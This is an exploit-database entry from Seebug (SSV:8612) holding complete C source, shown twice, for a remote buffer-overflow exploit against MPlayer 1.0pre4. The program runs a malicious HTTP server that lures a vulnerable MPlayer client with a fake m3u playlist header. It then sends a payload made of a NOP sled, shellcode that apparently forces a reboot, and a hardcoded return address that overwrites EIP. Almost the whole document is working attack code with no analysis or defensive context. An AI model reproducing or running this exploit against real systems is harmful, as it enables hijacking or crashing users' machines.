ID SSV:8612
Type seebug
Reporter Root
Modified 2008-06-05T00:00:00
Description
No description provided by source.
/*
c0ntex open-security org
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define SUCCESS 0 /* True */
#define FAILURE 1 /* False */
#define A_BANNER "_MPlayer_MeMPlayer_Media_Mayhem_"
#define ALIGN 0 /* Stack address alignment */
#define BUFFER 544 /* Exactly overwrite EIP */
#define EIPWRT 4 /* Byte count for overwrite */
#define NOP 0x90 /* NoOp padding */
#define OFFSET 0 /* Offset from retaddr */
#define PORT 80 /* Listener port */
#define RETADDR 0xbfffcb9c /* Remote return address */
#define THREAT "MPlayer/1.0pre4-3.2.2" /* Latest vulnerable version */
#define example(OhNoo) fprintf(stderr, "Usage: ./memplayer -a <align_val> -o <offset_val>\n\n",
OhNoo);
#define looking(OhYes) fprintf(stderr, "I'm looking for projects to work on, mail
me if you have something\n\n", OhYes);
unsigned int i;
char payload[BUFFER];
void banner(void);
void die(char *ohnn);
int pkg_prep(int clisock_fd, int align, int offset);
int pkg_send(int clisock_fd, char *payload);
int main(int argc, char **argv);
char *http[] = {
"HTTP/1.0 200 OK\r\n",
"Date: Thu, 01 Jun 2004 12:52:15 GMT\r\n",
"Server: MemPlayer/1.0.3 (Linux)\r\n",
"MIME-version: 1.0\r\n",
"Content-Type: audio/x-mpegurl\r\n",
"Content-Length: 666\r\n",
"Connection: close\r\n",
"\r\n"
};
char *m3umuxor[] = {
"\x23\x45\x58\x54\x4D\x33\x55\r\n",
"\x23\x45\x58\x54\x49\x4E\x46\x3A"
"\x2E\x2c\x4F\x70\x65\x6E\x2D\x53"
"\x65\x63\x75\x72\x69\x74\x79\x2E"
"\x52\x6F\x63\x6B\x73\r\n",
"\r\n"
};
char opcode[] = {
0x31,0xc0,0x89,0xc3,0xb0,0x17,0xcd,0x80,0x31,0xc0,0x89,0xc3,
0xb0,0x24,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xb0,0x24,0xcd,0x80,
0x31,0xc0,0x89,0xc3,0x89,0xc1,0x89,0xc2,0xb0,0x58,0xbb,0xad,
0xde,0xe1,0xfe,0xb9,0x69,0x19,0x12,0x28,0xba,0x67,0x45,0x23,
0x01,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xfe,0xc0,0xcd,0x80
};
void
banner(void)
{
fprintf(stderr, "\n ** MPlayer_Memplayer.c - Remote exploit demo POC **\n\n");
fprintf(stderr, "[-] Uses m3u header reference to make MPlayer think it has a\n");
fprintf(stderr, "[-] valid media file then crafted package is sent, overflows\n");
fprintf(stderr, "[-] the guiIntfStruct.Filename buffer && proves exploit POC.\n");
fprintf(stderr, "[-] c0ntex open-security org {} http://www.open-security.org \n\n");
}
void
die(char *err_trap)
{
perror(err_trap);
fflush(stderr); _exit(1);
}
int
pkg_prep(int clisock_fd, int align, int offset)
{
unsigned int recv_chk;
long retaddr;
char chk_vuln[69];
char *pload = (char *) &opcode;
retaddr = RETADDR - offset;
fprintf(stderr, " -> Using align [%d] and offset [%d]\n", align, offset);
memset(chk_vuln, 0, sizeof(chk_vuln));
recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln) -1, 0);
chk_vuln[recv_chk+1] = '\0';
if(recv_chk == -1 || recv_chk == 0) {
fprintf(stderr, "Could not receive data from client\n");
}
if(strstr(chk_vuln, THREAT) || strstr(chk_vuln, "MPlayer/0")) {
fprintf(stderr, " -> Detected vulnerable MPlayer version\n");
}else{
fprintf(stderr, " -> Detected a non-MPlayer connection, end.\n");
close(clisock_fd);
_exit(1);
}
fprintf(stderr, " -> Payload size to send is [%d]\n", sizeof(payload));
fprintf(stderr, " -> Sending evil payload to our client\n");
memset(payload, 0, BUFFER);
for(i = (BUFFER - EIPWRT); i < BUFFER; i += 4)
*(long *)&payload[i] = retaddr;
for (i = 0; i < (BUFFER - sizeof(opcode) - 4); ++i)
*(payload + i) = NOP;
memcpy(payload + i, pload, strlen(pload));
payload[545] = 0x00;
return SUCCESS;
}
int
pkg_send(int clisock_fd, char *payload)
{
for (i = 0; i < 8; i++)
if(send(clisock_fd, http[i], strlen(http[i]), 0) == -1) {
die("Could not send HTTP header");
}fprintf(stderr, "\t- Sending valid HTTP header..\n"); sleep(1);
for (i = 0; i < 3; i++)
if(send(clisock_fd, m3umuxor[i], strlen(m3umuxor[i]), 0) == -1) {
die("Could not send m3u header");
}fprintf(stderr, "\t- Sending valid m3u header..\n"); sleep(1);
if(send(clisock_fd, payload, strlen(payload), 0) == -1) {
die("Could not send payload");
}fprintf(stderr, "\t- Sending payload package..\n");
return SUCCESS;
}
int
main(int argc, char **argv)
{
unsigned int align = 0, offset = 0, reuse = 1;
unsigned int port = PORT;
unsigned int cl_buf, opts;
signed int clisock_fd, sock_fd;
static char *exploit, *work;
struct sockaddr_in victim;
struct sockaddr_in confess;
if(argc < 2) {
banner();
example(exploit);
_exit(1);
}banner();
while((opts = getopt(argc, argv, "a:o:")) != -1) {
switch(opts)
{
case 'a':
align = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
align = ALIGN;
offset = OFFSET;
}
}
if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
die("Could not create socket");
}
if(setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse, sizeof(int)) == -1) {
die("Could not re-use socket");
}
memset(&confess, 0, sizeof(confess));
confess.sin_family = AF_INET;
confess.sin_port = htons(port);
confess.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock_fd, (struct sockaddr *)&confess, sizeof(struct sockaddr)) == -1) {
die("Could not bind socket");
}
if(listen(sock_fd, 0) == -1) {
die("Could not listen on socket");
}
printf(" -> Listening for a connection on port %d\n", port);
cl_buf = sizeof(victim);
clisock_fd = accept(sock_fd, (struct sockaddr *)&victim, &cl_buf);
fprintf(stderr, " -> Action: Attaching from host[%s]\n", inet_ntoa(victim.sin_addr));
if(pkg_prep(clisock_fd, align, offset) == 1) {
fprintf(stderr, "Could not prep package\n");
_exit(1);
}
if(pkg_send(clisock_fd, payload) == 1) {
fprintf(stderr, "Could not send package\n");
_exit(1);
}
sleep(2);
fprintf(stderr, " -> Test complete\n\n");
close(clisock_fd); looking(work);
return SUCCESS;
}
{"sourceData": "\n /*\r\n\u00a0\u00a0c0ntex\u00a0open-security\u00a0org\r\n\u00a0\u00a0\u00a0\r\n\u00a0*/\r\n\r\n#include\u00a0<errno.h>\r\n#include\u00a0<stdio.h>\r\n#include\u00a0<stdlib.h>\r\n#include\u00a0<string.h>\r\n#include\u00a0<unistd.h>\r\n#include\u00a0<arpa/inet.h>\r\n#include\u00a0<netinet/in.h>\r\n#include\u00a0<sys/types.h>\r\n#include\u00a0<sys/socket.h>\r\n\r\n\r\n#define\u00a0SUCCESS\u00a00\u00a0/*\u00a0True\u00a0*/\r\n#define\u00a0FAILURE\u00a01\u00a0/*\u00a0False\u00a0*/\r\n\r\n\r\n#define\u00a0A_BANNER\u00a0"_MPlayer_MeMPlayer_Media_Mayhem_"\r\n#define\u00a0ALIGN\u00a00\u00a0/*\u00a0Stack\u00a0address\u00a0alignment\u00a0*/\r\n#define\u00a0BUFFER\u00a0544\u00a0/*\u00a0Exactly\u00a0overwrite\u00a0EIP\u00a0*/\r\n#define\u00a0EIPWRT\u00a04\u00a0/*\u00a0Byte\u00a0count\u00a0for\u00a0overwrite\u00a0*/\r\n#define\u00a0NOP\u00a00x90\u00a0/*\u00a0NoOp\u00a0padding\u00a0*/\r\n#define\u00a0OFFSET\u00a00\u00a0/*\u00a0Offset\u00a0from\u00a0retaddr\u00a0*/\r\n#define\u00a0PORT\u00a080\u00a0/*\u00a0Listener\u00a0port\u00a0*/\r\n#define\u00a0RETADDR\u00a00xbfffcb9c\u00a0/*\u00a0Remote\u00a0return\u00a0address\u00a0*/\r\n#define\u00a0THREAT\u00a0"MPlayer/1.0pre4-3.2.2"\u00a0/*\u00a0Latest\u00a0vulnerable\u00a0version\u00a0*/\r\n\r\n\r\n#define\u00a0example(OhNoo)\u00a0fprintf(stderr,\u00a0"Usage:\u00a0./memplayer\u00a0-a\u00a0<align_val>\u00a0-o\u00a0<offset_val>\\n\\n",\r\nOhNoo);\r\n#define\u00a0looking(OhYes)\u00a0\u00a0fprintf(stderr,\u00a0"I'm\u00a0looking\u00a0for\u00a0projects\u00a0to\u00a0work\u00a0on,\u00a0mail\r\nme\u00a0if\u00a0you\u00a0have\u00a0something\\n\\n",\u00a0OhYes);\r\n\r\n\r\nunsigned\u00a0int\u00a0i;\r\nchar\u00a0payload[BUFFER];\r\n\r\nvoid\u00a0banner(void);\r\nvoid\u00a0die(char\u00a0*ohnn);\r\n\r\nint\u00a0pkg_prep(int\u00a0clisock_fd,\u00a0int\u00a0align,\u00a0int\u00a0offset);\r\nint\u00a0pkg_send(int\u00a0clisock_fd,\u00a0char\u00a0*payload);\r\nint\u00a0main(int\u00a0argc,\u00a0char\u00a0**argv);\r\n\r\n\r\nchar\u00a0*http[]\u00a0=\u00a0{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"HTTP/1.0\u00a0200\u00a0OK\\r\\n",\r\n"Date:\u00a0Thu,\u00a001\u00a0Jun\u00a02004\u00a012:52:15\u00a0GMT\\r\\n",\r\n"Server:\u00a0MemPlayer/1.0.3\u00a0(Linux)\\r\\n",\r\n"MIME-version:\u00a01.0\\r\\n",\r\n"Content-Type:\u00a0audio/x-mpegurl\\r\\n",\r\n"Content-Length:\u00a0666\\r\\n",\r\n"Connection:\u00a0close\\r\\n",\r\n"\\r\\n"\r\n};\r\n\r\n\r\nchar\u00a0*m3umuxor[]\u00a0=\u00a0{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\x23\\x45\\x58\\x54\\x4D\\x33\\x55\\r\\n",\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\x23\\x45\\x58\\x54\\x49\\x4E\\x46\\x3A"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\x2E\\x2c\\x4F\\x70\\x65\\x6E\\x2D\\x53"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\x65\\x63\\x75\\x72\\x69\\x74\\x79\\x2E"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\x52\\x6F\\x63\\x6B\\x73\\r\\n",\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0"\\r\\n"\r\n};\r\n\r\n\r\nchar\u00a0opcode[]\u00a0=\u00a0{\r\n0x31,0xc0,0x89,0xc3,0xb0,0x17,0xcd,0x80,0x31,0xc0,0x89,0xc3,\r\n0xb0,0x24,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xb0,0x24,0xcd,0x80,\r\n0x31,0xc0,0x89,0xc3,0x89,0xc1,0x89,0xc2,0xb0,0x58,0xbb,0xad,\r\n0xde,0xe1,0xfe,0xb9,0x69,0x19,0x12,0x28,0xba,0x67,0x45,0x23,\r\n0x01,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xfe,0xc0,0xcd,0x80\r\n};\r\n\r\n\r\nvoid\r\nbanner(void)\r\n{\r\nfprintf(stderr,\u00a0"\\n\u00a0\u00a0**\u00a0MPlayer_Memplayer.c\u00a0-\u00a0Remote\u00a0exploit\u00a0demo\u00a0POC\u00a0**\\n\\n");\r\nfprintf(stderr,\u00a0"[-]\u00a0Uses\u00a0m3u\u00a0header\u00a0reference\u00a0to\u00a0make\u00a0MPlayer\u00a0think\u00a0it\u00a0has\u00a0a\\n");\r\nfprintf(stderr,\u00a0"[-]\u00a0valid\u00a0media\u00a0file\u00a0then\u00a0crafted\u00a0package\u00a0is\u00a0sent,\u00a0overflows\\n");\r\nfprintf(stderr,\u00a0"[-]\u00a0the\u00a0guiIntfStruct.Filename\u00a0buffer\u00a0&&\u00a0proves\u00a0exploit\u00a0POC.\\n");\r\nfprintf(stderr,\u00a0"[-]\u00a0c0ntex\u00a0open-security\u00a0org\u00a0{}\u00a0http://www.open-security.org\u00a0\u00a0\\n\\n");\r\n}\r\n\r\n\r\nvoid\r\ndie(char\u00a0*err_trap)\r\n{\r\nperror(err_trap);\r\nfflush(stderr);\u00a0_exit(1);\r\n}\r\n\r\n\r\nint\r\npkg_prep(int\u00a0clisock_fd,\u00a0int\u00a0align,\u00a0int\u00a0offset)\r\n{\r\nunsigned\u00a0int\u00a0recv_chk;\r\nlong\u00a0retaddr;\r\n\r\nchar\u00a0chk_vuln[69];\r\nchar\u00a0*pload\u00a0=\u00a0(char\u00a0*)\u00a0&opcode;\r\n\r\n\r\nretaddr\u00a0=\u00a0RETADDR\u00a0-\u00a0offset;\r\n\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Using\u00a0align\u00a0[%d]\u00a0and\u00a0offset\u00a0[%d]\\n",\u00a0align,\u00a0offset);\r\n\r\nmemset(chk_vuln,\u00a00,\u00a0sizeof(chk_vuln));\r\n\r\nrecv_chk\u00a0=\u00a0recv(clisock_fd,\u00a0chk_vuln,\u00a0sizeof(chk_vuln)\u00a0-1,\u00a00);\r\nchk_vuln[recv_chk+1]\u00a0=\u00a0'\\0';\r\n\r\nif(recv_chk\u00a0==\u00a0-1\u00a0||\u00a0recv_chk\u00a0==\u00a00)\u00a0{\r\nfprintf(stderr,\u00a0"Could\u00a0not\u00a0receive\u00a0data\u00a0from\u00a0client\\n");\r\n}\r\n\r\nif(strstr(chk_vuln,\u00a0THREAT)\u00a0||\u00a0strstr(chk_vuln,\u00a0"MPlayer/0"))\u00a0{\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Detected\u00a0vulnerable\u00a0MPlayer\u00a0version\\n");\r\n}else{\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Detected\u00a0a\u00a0non-MPlayer\u00a0connection,\u00a0end.\\n");\r\nclose(clisock_fd);\r\n_exit(1);\r\n}\r\n\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Payload\u00a0size\u00a0to\u00a0send\u00a0is\u00a0[%d]\\n",\u00a0sizeof(payload));\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Sending\u00a0evil\u00a0payload\u00a0to\u00a0our\u00a0client\\n");\r\n\r\nmemset(payload,\u00a00,\u00a0BUFFER);\r\n\r\nfor(i\u00a0=\u00a0(BUFFER\u00a0-\u00a0EIPWRT);\u00a0i\u00a0<\u00a0BUFFER;\u00a0i\u00a0+=\u00a04)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0*(long\u00a0*)&payload[i]\u00a0=\u00a0retaddr;\r\n\r\nfor\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0(BUFFER\u00a0-\u00a0sizeof(opcode)\u00a0-\u00a04);\u00a0++i)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0*(payload\u00a0+\u00a0i)\u00a0=\u00a0NOP;\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0memcpy(payload\u00a0+\u00a0i,\u00a0pload,\u00a0strlen(pload));\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0payload[545]\u00a0=\u00a00x00;\r\n\r\nreturn\u00a0SUCCESS;\r\n}\r\n\r\n\r\nint\r\npkg_send(int\u00a0clisock_fd,\u00a0char\u00a0*payload)\r\n{\r\n\r\nfor\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a08;\u00a0i++)\r\nif(send(clisock_fd,\u00a0http[i],\u00a0strlen(http[i]),\u00a00)\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0send\u00a0HTTP\u00a0header");\r\n}fprintf(stderr,\u00a0"\\t-\u00a0Sending\u00a0valid\u00a0HTTP\u00a0header..\\n");\u00a0sleep(1);\r\n\r\nfor\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a03;\u00a0i++)\r\nif(send(clisock_fd,\u00a0m3umuxor[i],\u00a0strlen(m3umuxor[i]),\u00a00)\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0send\u00a0m3u\u00a0header");\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}fprintf(stderr,\u00a0"\\t-\u00a0Sending\u00a0valid\u00a0m3u\u00a0header..\\n");\u00a0sleep(1);\r\n\r\nif(send(clisock_fd,\u00a0payload,\u00a0strlen(payload),\u00a00)\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0send\u00a0payload");\r\n}fprintf(stderr,\u00a0"\\t-\u00a0Sending\u00a0payload\u00a0package..\\n");\r\n\r\nreturn\u00a0SUCCESS;\r\n}\r\n\r\n\r\nint\r\nmain(int\u00a0argc,\u00a0char\u00a0**argv)\r\n{\r\nunsigned\u00a0int\u00a0align\u00a0=\u00a00,\u00a0offset\u00a0=\u00a00,\u00a0reuse\u00a0=\u00a01;\r\nunsigned\u00a0int\u00a0port\u00a0=\u00a0PORT;\r\nunsigned\u00a0int\u00a0cl_buf,\u00a0opts;\r\n\r\nsigned\u00a0int\u00a0clisock_fd,\u00a0sock_fd;\r\n\r\nstatic\u00a0char\u00a0*exploit,\u00a0*work;\r\n\r\nstruct\u00a0sockaddr_in\u00a0victim;\r\nstruct\u00a0sockaddr_in\u00a0confess;\r\n\r\n\r\nif(argc\u00a0<\u00a02)\u00a0{\r\nbanner();\r\nexample(exploit);\r\n_exit(1);\r\n}banner();\r\n\r\n\r\nwhile((opts\u00a0=\u00a0getopt(argc,\u00a0argv,\u00a0"a:o:"))\u00a0!=\u00a0-1)\u00a0{\r\nswitch(opts)\r\n{\r\ncase\u00a0'a':\r\nalign\u00a0=\u00a0atoi(optarg);\r\nbreak;\r\ncase\u00a0'o':\r\noffset\u00a0=\u00a0atoi(optarg);\r\nbreak;\r\ndefault:\r\nalign\u00a0=\u00a0ALIGN;\r\noffset\u00a0=\u00a0OFFSET;\r\n}\r\n}\r\n\r\nif((sock_fd\u00a0=\u00a0socket(AF_INET,\u00a0SOCK_STREAM,\u00a00))\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0create\u00a0socket");\r\n}\r\n\r\nif(setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR,\u00a0&reuse,\u00a0sizeof(int))\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0re-use\u00a0socket");\r\n}\r\n\r\nmemset(&confess,\u00a00,\u00a0sizeof(confess));\r\n\r\nconfess.sin_family\u00a0=\u00a0AF_INET;\r\nconfess.sin_port\u00a0=\u00a0htons(port);\r\nconfess.sin_addr.s_addr\u00a0=\u00a0htonl(INADDR_ANY);\r\n\r\nif(bind(sock_fd,\u00a0(struct\u00a0sockaddr\u00a0*)&confess,\u00a0sizeof(struct\u00a0sockaddr))\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0bind\u00a0socket");\r\n}\r\n\r\nif(listen(sock_fd,\u00a00)\u00a0==\u00a0-1)\u00a0{\r\ndie("Could\u00a0not\u00a0listen\u00a0on\u00a0socket");\r\n}\r\n\r\nprintf("\u00a0->\u00a0Listening\u00a0for\u00a0a\u00a0connection\u00a0on\u00a0port\u00a0%d\\n",\u00a0port);\r\n\r\ncl_buf\u00a0=\u00a0sizeof(victim);\r\nclisock_fd\u00a0=\u00a0accept(sock_fd,\u00a0(struct\u00a0sockaddr\u00a0*)&victim,\u00a0&cl_buf);\r\n\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Action:\u00a0Attaching\u00a0from\u00a0host[%s]\\n",\u00a0inet_ntoa(victim.sin_addr));\r\n\r\nif(pkg_prep(clisock_fd,\u00a0align,\u00a0offset)\u00a0==\u00a01)\u00a0{\r\nfprintf(stderr,\u00a0"Could\u00a0not\u00a0prep\u00a0package\\n");\r\n_exit(1);\r\n}\r\n\r\nif(pkg_send(clisock_fd,\u00a0payload)\u00a0==\u00a01)\u00a0{\r\nfprintf(stderr,\u00a0"Could\u00a0not\u00a0send\u00a0package\\n");\r\n_exit(1);\r\n}\r\nsleep(2);\r\n\r\nfprintf(stderr,\u00a0"\u00a0->\u00a0Test\u00a0complete\\n\\n");\r\n\r\nclose(clisock_fd);\u00a0looking(work);\r\n\r\nreturn\u00a0SUCCESS;\r\n}\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8612", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8612", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 0, "references": [], "lastseen": "2017-11-19T21:40:22", "published": "2008-06-05T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:8612", "enchantments_done": [], "modified": "2008-06-05T00:00:00", "title": "MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2017-11-19T21:40:22"}, "vulnersScore": 7.5}, "_object_type": "robots.models.seebug.SeebugBulletin"}
{}
